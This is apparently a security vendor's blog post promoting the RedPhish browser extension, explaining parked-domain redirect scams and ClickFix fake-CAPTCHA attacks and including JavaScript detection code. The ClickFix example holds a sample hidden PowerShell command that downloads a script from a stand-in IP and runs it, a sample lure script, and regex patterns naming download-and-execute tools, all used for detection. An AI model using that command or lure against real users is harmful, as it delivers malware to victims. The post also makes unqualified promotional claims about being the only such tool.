Two Browser Attacks You Have Never Heard Of That Are Stealing Millions in 2026
Parked domains and ClickFix attacks are silently draining bank accounts and infecting devices across the web. Learn how these hidden threats work, why traditional security tools miss them, and how RedPhish automatically blocks both before you even see the trap.
RedPhish Team
January 7, 2026
Most people think they're safe online as long as they don't click on obvious spam.
That was true five years ago.
It's not true anymore.
Two attacks are now stealing millions of dollars and infecting thousands of devices every single day. Neither of them looks suspicious. Neither of them triggers warnings from your email provider. And neither of them requires you to download anything shady.
One attack happens when you make a tiny typo in a web address.
The other attack happens when you try to prove you're human.
If you haven't heard of parked domain attacks or ClickFix, you're not alone. Most people haven't. But security researchers are now calling these two threats the most dangerous browser attacks of the year.
This guide explains how both attacks work, why they're spreading so fast, and how RedPhish is the only browser security tool that automatically detects and blocks both.
Table of contents
- The problem nobody is talking about
- Attack 1: Parked domains that bite back
- How parked domain attacks actually work
- Attack 2: ClickFix and the fake CAPTCHA trap
- How ClickFix tricks you into infecting yourself
- Why traditional security tools miss both attacks
- How RedPhish blocks parked domains and ClickFix automatically
- How to protect yourself starting today
The problem nobody is talking about
Browser attacks have changed.
The old playbook was simple. Criminals sent phishing emails with bad links. Security tools blocked those links. Users learned to look for the padlock icon.
That playbook is broken.
Security researchers at Infoblox found that over 90% of visits to parked domains from residential internet connections now redirect people to scams, malware, or phishing pages. A decade ago, that number was less than 5%. (krebsonsecurity.com)
At the same time, ESET reported that ClickFix social engineering attacks surged by 517% in the first half of 2025 alone. This technique is now the second most common attack vector behind only traditional phishing. (infosecurity-magazine.com)
These aren't edge cases.
These are the two fastest growing threats on the internet right now.
And the scary part is that both attacks exploit completely normal behavior. Typing a web address. Clicking a CAPTCHA. Actions you perform every single day without thinking.
Attack 1: Parked domains that bite back
A parked domain is a website that exists but doesn't host real content.
You've probably seen them before. You type a URL slightly wrong and land on a generic page filled with ads and search links. Maybe there is a message that says the domain is for sale.
For years these pages were annoying but mostly harmless.
That changed completely.
New research from Infoblox shows that parked domains have transformed from digital clutter into an almost exclusively malicious attack surface. In large scale experiments, more than 90% of visits to parked domains from residential internet connections were redirected to scams, scareware, or malware landing pages. (krebsonsecurity.com)
"A decade ago, research showed that parked domains were mostly harmless and rarely more than digital clutter," said Dr. Renée Burton, Vice President of Infoblox Threat Intel. "Today, our research shows they've become almost exclusively malicious." (cybersecurityasia.net)
The math is brutal.
You mistype one letter in your bank name and land on a parked domain. Within seconds you're staring at a fake login page or a malware download prompt.
You click an old link from a friend and the site they used to visit is now parked. Instead of an error page, you get redirected through a chain of shady advertisers until you land on a scam.
Your child searches for free game coins and clicks on a result that leads to a parked typo domain. The next thing you see is a charge on your credit card statement.
How parked domain attacks actually work
When you visit a parked domain, you don't just see a placeholder page.
Behind the scenes, a complex chain of events begins.
The domain owner has opted into something called direct search or zero click parking. This means your visit is instantly sold to advertisers who bid on your traffic based on keywords and your device profile. (krebsonsecurity.com)
Those advertisers often resell your visit to other affiliates. Each step adds another redirect. By the time you reach your final destination, you've passed through multiple traffic distribution systems that profile your device, IP address, and browser.
Researchers found that the malicious redirects fire mostly for people on home internet connections. If you're using a VPN or corporate network, you often see a harmless parking page instead. Because automated security scanners typically run from datacenter or corporate addresses, this filtering helps attackers avoid detection. (krebsonsecurity.com)
The Infoblox investigation identified single entities controlling thousands of lookalike domains targeting major platforms like Gmail, YouTube, and Microsoft. Some of these domains even run mail servers to capture emails sent to mistyped addresses. (infoblox.com)
What makes this even worse is that Google's advertising policy change in March 2025 may have accidentally made the problem worse. Google began excluding advertisers from parked domain traffic unless they explicitly opted in, which cut the money flowing through its regulated network. Many domain owners responded by switching to unregulated direct search networks that are willing to serve malicious ads for higher payouts. (infoblox.com)
The result is an entire ecosystem where a simple typo can cost you your bank account, your passwords, or your device.
Attack 2: ClickFix and the fake CAPTCHA trap
ClickFix is a different kind of attack.
Instead of hoping you make a typo, criminals using ClickFix trick you into infecting your own device.
The technique first appeared in late 2023 and has exploded in popularity. Security firm ESET found that ClickFix attacks surged by 517% in six months, making it the second most common attack vector behind traditional phishing. (infosecurity-magazine.com)
Here's how it works.
You visit a website. Maybe you clicked a link in an email. Maybe you searched for something and clicked a result. Maybe you scanned a QR code.
The website shows you a fake CAPTCHA or verification prompt. It looks exactly like the "I'm not a robot" boxes you've clicked hundreds of times before.
But when you click the button, something different happens.
Instead of verifying you're human, the page displays instructions telling you to press a combination of keys. Usually it asks you to press Windows+R to open a Run dialog, then Ctrl+V to paste something, then Enter to execute.
What you don't realize is that the page has already copied a malicious command to your clipboard. When you follow the instructions, you're pasting and running malware on your own computer. (cisecurity.org)
How ClickFix tricks you into infecting yourself
ClickFix is brilliant in a terrifying way.
Traditional malware needs to find a way past your security software. It needs to exploit a vulnerability or trick you into downloading a file.
ClickFix bypasses all of that by making you do the work yourself.
Because you're the one executing the command, and because it runs through a trusted, signed system program such as PowerShell that you launched yourself, security software often doesn't flag it. You initiated the action. You pasted the code. You pressed Enter. (fieldeffect.com)
Microsoft researchers found that ClickFix campaigns have been used to deliver banking trojans, infostealers, ransomware, remote access tools, and even custom malware from nation state threat actors. One campaign impersonated the US Social Security Administration to deliver remote management software that gave attackers full control over victims' systems. (microsoft.com)
The technique works on both Windows and Mac. In June 2025, researchers observed a campaign targeting macOS users to deliver the Atomic Stealer malware. (microsoft.com)
Nation state groups including Russia's APT28 and Iran's MuddyWater have adopted ClickFix for cyber espionage campaigns, showing that this isn't just a tool for small time criminals. (darktrace.com)
The CIS Cyber Threat Intelligence team tracked ClickFix campaigns that led to ransomware attacks against US state and local government organizations. (cisecurity.org)
ClickFix works because it targets human behavior, not technical vulnerabilities. You've been trained for years to complete CAPTCHAs and verification prompts. Criminals are exploiting that training. (logpoint.com)
Why traditional security tools miss both attacks
If parked domains and ClickFix are so dangerous, why doesn't your existing security software block them?
The answer is simple. These attacks are designed specifically to evade traditional defenses.
Parked domain evasion
Parked domain redirect chains filter their traffic. The traffic distribution systems behind the parking page look at the visitor's IP address, network type, and browser profile. If the visit looks like it came from a security company, VPN, datacenter, or corporate network, the domain shows a harmless parking page. Only real users on residential connections are likely to see the malicious redirects. (krebsonsecurity.com)
This means automated blocklists often never see the attack. The domain looks clean when tested but turns malicious for actual victims.
The redirect chains also change constantly. Even if one domain gets blocked, attackers swap it out and keep going.
ClickFix evasion
ClickFix is even harder to block because the user initiates the attack themselves.
Security software is designed to stop malicious files from running. But with ClickFix, there's no file to scan at the moment you click. The text on your clipboard is usually a one-line PowerShell or mshta command that only fetches the real payload after you paste it and press Enter. (fieldeffect.com)
Email filters often can't help because the malicious page might be reached through a legitimate website that was compromised. URL filters often can't help because the page itself isn't hosting malware, just instructions and a script that writes to your clipboard.
Unit 42 researchers noted that ClickFix campaigns exploit multiple entry points including SEO poisoning, malvertising, and spoofed browser alerts. This makes traditional single point defenses ineffective. (paloaltonetworks.com)
The bottom line is that both attacks are specifically engineered to slip through the security tools most people rely on.
How RedPhish blocks parked domains and ClickFix automatically
RedPhish takes a different approach.
Instead of relying on static blocklists or file scanning, RedPhish analyzes behavior in real time right in your browser where both attacks actually happen.
Parked domain protection
RedPhish detects the characteristic patterns of malicious parked domains before they can redirect you.
When you visit a suspicious domain, RedPhish looks at multiple signals including domain age, parking indicators, redirect behavior, and content patterns. If the domain matches the profile of a weaponized parking page, RedPhish blocks the load before you ever see the malicious content.
This works even when the domain is brand new and not on any blocklist. It works even when the attackers are fingerprinting traffic to hide from security scanners. RedPhish runs locally in your browser, so it sees exactly what you see.
- Typosquatted bank domains - You mistype your bank address and land on a parked typo domain. RedPhish scores the domain, sees the suspicious redirects and content patterns, and blocks the page before you reach the fake login.
- Expired store links - You click an old email link that now points to a parked domain selling your traffic to scam advertisers. RedPhish detects the risky parking and redirect behavior and stops the load with a clear warning.
- Kids clicking on scam results - A child taps a search result that leads to a parked domain promising free game currency. RedPhish sees that the domain is newly created, parked, and using aggressive redirects, and quietly blocks it before the child ever sees the trap.
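To make the mechanics under "How parked domain attacks actually work" and the signals listed above concrete (a lookalike hostname, parking-page content, a redirect chain that crosses several traffic distribution domains, a young registration), here is an added illustrative scorer in JavaScript. It is not RedPhish's code: the brand watchlist, the parking phrase list, the weights, the 50-point block threshold and every hostname in the samples are assumptions made for this example.

```javascript
// Added example: a parked-domain / typosquat risk scorer. Illustrative only,
// not RedPhish's code; watchlist, phrase list, weights and hostnames are assumptions.

const WATCHED_BRANDS = ["gmail", "youtube", "microsoft", "paypal"]; // assumed watchlist

// Phrases that commonly appear on parked or for-sale placeholder pages (constructed list).
const PARKING_MARKERS = [
  /this domain (?:is|may be) for sale/i,
  /buy this domain/i,
  /related searches/i,
  /sponsored listings/i,
  /parked free/i,
];

// Damerau-Levenshtein (optimal string alignment) distance. Insertions, deletions,
// substitutions and adjacent transpositions each cost 1, so "gmial" vs "gmail" is 1.
function editDistance(a, b) {
  const d = Array.from({ length: a.length + 1 }, () => new Array(b.length + 1).fill(0));
  for (let i = 0; i <= a.length; i++) d[i][0] = i;
  for (let j = 0; j <= b.length; j++) d[0][j] = j;
  for (let i = 1; i <= a.length; i++) {
    for (let j = 1; j <= b.length; j++) {
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      d[i][j] = Math.min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost);
      if (i > 1 && j > 1 && a[i - 1] === b[j - 2] && a[i - 2] === b[j - 1]) {
        d[i][j] = Math.min(d[i][j], d[i - 2][j - 2] + 1); // transposition
      }
    }
  }
  return d[a.length][b.length];
}

// Label directly under the TLD ("gmial" for "www.gmial.example"). Naive: a real tool
// would consult the Public Suffix List to handle suffixes such as co.uk.
function secondLevelLabel(hostname) {
  const labels = hostname.toLowerCase().split(".").filter(Boolean);
  return labels.length >= 2 ? labels[labels.length - 2] : labels[0] || "";
}

// The watched brand this hostname is one typo away from, or null.
function typosquatTarget(hostname) {
  const label = secondLevelLabel(hostname);
  if (WATCHED_BRANDS.includes(label)) return null; // the real brand, not a squat
  for (const brand of WATCHED_BRANDS) {
    if (editDistance(label, brand) <= 1) return brand;
  }
  return null;
}

// Number of hops and distinct registrable domains in an observed redirect chain.
// Parking traffic resold through several distribution systems crosses many domains.
function chainStats(redirectHops) {
  const domains = new Set(
    redirectHops.map((u) => new URL(u).hostname.toLowerCase().split(".").slice(-2).join(".")),
  );
  return { hops: redirectHops.length, distinctDomains: domains.size };
}

// Combine the signals into a 0-100 score; weights and threshold are assumptions.
function scoreParkedDomain({ hostname, html, redirectHops, domainAgeDays }) {
  const reasons = [];
  let score = 0;
  const target = typosquatTarget(hostname);
  if (target) { score += 40; reasons.push(`lookalike of ${target}`); }
  const markers = PARKING_MARKERS.filter((re) => re.test(html)).length;
  if (markers > 0) { score += 20 + 5 * Math.min(markers, 4); reasons.push(`${markers} parking marker(s)`); }
  const { hops, distinctDomains } = chainStats(redirectHops);
  if (distinctDomains >= 3) { score += 25; reasons.push(`bounced across ${distinctDomains} domains in ${hops} hops`); }
  if (typeof domainAgeDays === "number" && domainAgeDays < 30) { score += 15; reasons.push("registered under 30 days ago"); }
  return { score: Math.min(score, 100), block: score >= 50, reasons };
}

// Constructed sample: a mistyped Gmail visit that bounces through two traffic
// distribution hosts before landing on a scareware page. Hostnames are invented.
const SAMPLE_TYPO_VISIT = {
  hostname: "www.gmial.example",
  html: "<title>gmial.example</title><p>This domain is for sale.</p><h3>Related searches</h3>",
  redirectHops: [
    "http://www.gmial.example/",
    "http://clk.tds-example.net/r?k=email",
    "http://go.affnet-example.org/land",
    "https://alert-example.xyz/scan.html",
  ],
  domainAgeDays: 12,
};

// Constructed control: the real brand, a short same-owner redirect, an old registration.
const SAMPLE_LEGIT_VISIT = {
  hostname: "www.gmail.com",
  html: "<title>Gmail</title>",
  redirectHops: ["https://www.gmail.com/", "https://mail.google.com/"],
  domainAgeDays: 7000,
};

console.log(scoreParkedDomain(SAMPLE_TYPO_VISIT));  // block: true
console.log(scoreParkedDomain(SAMPLE_LEGIT_VISIT)); // block: false
```

Two design points worth noting. The content and redirect signals can only be collected from the vantage point that actually receives the malicious chain, which, as the article notes, is a residential connection; a scanner in a datacenter would see the harmless page and score it clean. And the typo check deliberately stops at one edit, since wider thresholds start flagging unrelated short words; a production tool would add homoglyph folding (0 for o, 1 for l) and the Public Suffix List.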
ClickFix protection
RedPhish also protects against ClickFix attacks by detecting the social engineering patterns these campaigns use.
When you land on a page that displays a fake CAPTCHA or verification prompt designed to trick you into executing code, RedPhish recognizes the pattern. It analyzes the page content for the characteristic elements of ClickFix lures including fake error messages, clipboard manipulation attempts, and instructions that ask you to open system dialogs.
If RedPhish detects a ClickFix attack, it blocks the page and shows you a warning explaining what was about to happen. You never have to wonder whether a verification prompt is real or fake. RedPhish handles it for you.
This is critical because ClickFix attacks work by exploiting your trust in familiar interfaces. You can't be expected to examine every CAPTCHA you see to figure out if it's legitimate. That's what RedPhish is for.
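The two checks described here and in the "Here's how it works" walkthrough above, a page silently staging a command on the clipboard and a fake verification prompt that walks the victim through Windows+R, Ctrl+V and Enter, as an added illustrative example in JavaScript. This is not RedPhish's code: the command patterns, the lure phrases, the two-hit threshold and the sample payload and lure text are assumptions constructed for the example, and the host in the sample is a documentation address.

```javascript
// Added example: two ClickFix checks a browser-extension content script could run.
// Illustrative only, not RedPhish's code; pattern lists, thresholds and samples are
// assumptions made for this example.

// Command "cradles" seen in ClickFix payloads: PowerShell or mshta/cmd launchers,
// hidden-window / no-profile / encoded-command flags, download-and-execute verbs,
// piping into an interpreter, and bare-IP download hosts.
const COMMAND_PATTERNS = [
  /\bpowershell(?:\.exe)?\b|\bpwsh\b/i,
  /\b(?:mshta|cmd(?:\.exe)?|wscript|cscript|rundll32|regsvr32|certutil|bitsadmin)\b/i,
  /-(?:w(?:indowstyle)?\s+hidden|nop(?:rofile)?\b|e(?:xecution)?p(?:olicy)?\s+bypass|e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,})/i,
  /\b(?:iwr|irm|Invoke-WebRequest|Invoke-RestMethod|Invoke-Expression|iex|DownloadString|curl|wget)\b/i,
  /\|\s*(?:bash|sh|zsh|iex|Invoke-Expression)\b/i,
  /\b\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?\//,
];

// How many cradle patterns the text hits. One hit (say, a curl line copied from
// documentation) is normal; two or more is the shape of a staged attack command.
function classifyClipboardText(text) {
  const hits = COMMAND_PATTERNS.filter((re) => re.test(text)).length;
  return { suspicious: hits >= 2, hits };
}

// The lure's script, split into the four elements a real CAPTCHA never combines:
// a pretext, a step that opens a command surface, a paste step, and an execute step.
const LURE_STEPS = {
  pretext: /verify (?:you are|you're) (?:a )?human|i'?m not a robot|verification steps?|(?:fix|repair) (?:the |this )?(?:error|issue|display|browser|connection)/i,
  open: /(?:windows|win)\s*(?:key)?\s*\+\s*r\b|run dialog|open (?:the )?terminal|command prompt/i,
  paste: /ctrl\s*\+\s*v\b|cmd\s*\+\s*v\b|\bpaste\b/i,
  exec: /(?:press|hit)\s+(?:the\s+)?(?:enter|return)\b/i,
};

function scoreLureText(text) {
  const t = text.replace(/\s+/g, " ");
  const steps = Object.fromEntries(Object.entries(LURE_STEPS).map(([k, re]) => [k, re.test(t)]));
  const matched = Object.values(steps).filter(Boolean).length;
  // Pretext + open + paste is enough: no legitimate verification asks for that.
  return { clickfix: steps.pretext && steps.open && steps.paste, matched, steps };
}

// Wraps clipboard.writeText so the page's attempt to stage a command is inspected
// before it lands on the clipboard. The navigator object is a parameter so this runs
// under Node for the demo; in the page's JavaScript world you would pass `navigator`.
function installClipboardGuard(nav, onBlock) {
  const original = nav.clipboard.writeText.bind(nav.clipboard);
  nav.clipboard.writeText = function guardedWriteText(text) {
    const verdict = classifyClipboardText(String(text));
    if (verdict.suspicious) {
      onBlock(String(text), verdict);
      return Promise.reject(new Error("clipboard write blocked: text looks like a command cradle"));
    }
    return original(text);
  };
}

// Constructed samples modelled on public descriptions of ClickFix. The trailing
// comment is a trick real lures use so the Run dialog shows a harmless-looking tail.
// 192.0.2.10 is a documentation address, not a real host.
const SAMPLE_PAYLOAD =
  'powershell -w hidden -nop -c "iwr http://192.0.2.10/verify.ps1 | iex" # "I am not a robot - reCAPTCHA Verification ID: 8412"';
const SAMPLE_LURE =
  "Verify you are human. Verification Steps: 1. Press Windows key + R 2. Press CTRL + V 3. Press Enter";
const BENIGN_COPY = "curl -sS https://example.com/api/health";
const BENIGN_CAPTCHA = "Verify you are human by completing the action below. I'm not a robot";

// Stand-alone demo against a mock navigator.
const blockedWrites = [];
const mockNavigator = { clipboard: { writeText: (t) => Promise.resolve(t) } };
installClipboardGuard(mockNavigator, (text, verdict) => blockedWrites.push({ text, verdict }));
mockNavigator.clipboard.writeText(SAMPLE_PAYLOAD).catch(() => {}); // blocked
mockNavigator.clipboard.writeText(BENIGN_COPY);                    // allowed
console.log(blockedWrites.length, scoreLureText(SAMPLE_LURE), scoreLureText(BENIGN_CAPTCHA));
```

Two caveats for anyone turning this into an extension. A content script normally runs in an isolated world, so the wrapper only catches the page's own calls if it is injected into the page's main world; lures also stage text through a hidden textarea plus document.execCommand("copy") or a copy event handler calling clipboardData.setData, so those paths need the same inspection. And the lure-text check is a heuristic: a genuine support article that says "to fix the error, press Windows+R and paste this" will match, which is why the clipboard content, not the wording alone, should carry the blocking decision.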
Why RedPhish is different
Most browser security tools work by checking URLs against blocklists. If the URL is on the list, it gets blocked. If not, it gets through.
That approach can't keep up with parked domains that change constantly or ClickFix pages that are hosted on compromised legitimate websites.
RedPhish uses real time behavioral analysis instead. It looks at what a page is actually doing, not just where it comes from. This means RedPhish can block attacks that no blocklist has ever seen.
RedPhish is also the only browser security tool specifically designed to protect against both parked domain redirects and ClickFix social engineering in a single product. You don't need to install multiple extensions or hope that different tools will cover different threats.
How to protect yourself starting today
Parked domains and ClickFix aren't going away. Both attacks are spreading because they work.
The good news is that protecting yourself isn't complicated.
1. Install browser protection that understands both threats
Traditional antivirus runs on your device and scans files. That's not enough anymore.
You need protection that runs in your browser where parked domain redirects and ClickFix pages actually happen. RedPhish blocks both attacks automatically without slowing you down.
2. Stop typing addresses from memory
Use bookmarks for sites you visit often. Let your password manager fill in login URLs so you never accidentally land on a typo domain.
If you must type an address, slow down and double check before pressing Enter.
3. Be suspicious of any verification that asks you to run commands
Real CAPTCHAs and verification prompts never ask you to open a Run dialog or a Terminal window, copy and paste code, or execute commands.
If any website asks you to do these things, close the tab immediately. It doesn't matter how legitimate the site looks or how urgent the message seems.
4. Keep your family informed
Parked domain attacks and ClickFix both target everyone, not just technical users.
Make sure the people in your life know about these threats. A quick conversation can prevent a costly mistake.
5. Trust protection over intuition
You can't spot every parked domain redirect. You can't examine every CAPTCHA to see if it's fake.
That's why browser security tools like RedPhish exist. Let the technology do the work so you can browse without constantly second guessing yourself.
The bottom line
Two attacks are dominating the threat landscape in 2026.
Parked domains that used to be harmless placeholders now redirect over 90% of visitors to scams and malware. ClickFix attacks have surged over 500% by tricking people into infecting their own devices through fake verification prompts.
Both attacks exploit normal everyday behavior. Both attacks slip past traditional security tools. And both attacks are spreading faster than ever.
RedPhish is the only browser security tool that automatically detects and blocks both parked domain redirects and ClickFix social engineering attacks. It runs in your browser where these attacks actually happen and uses real time behavioral analysis instead of outdated blocklists.
You shouldn't have to become a security expert to stay safe online.
Install RedPhish and let it handle the threats so you can browse in peace.
Protect Yourself from Phishing
RedPhish scans every link in real-time and blocks threats before you click. Install in 30 seconds.
Works on Chrome, Firefox, Edge, and Opera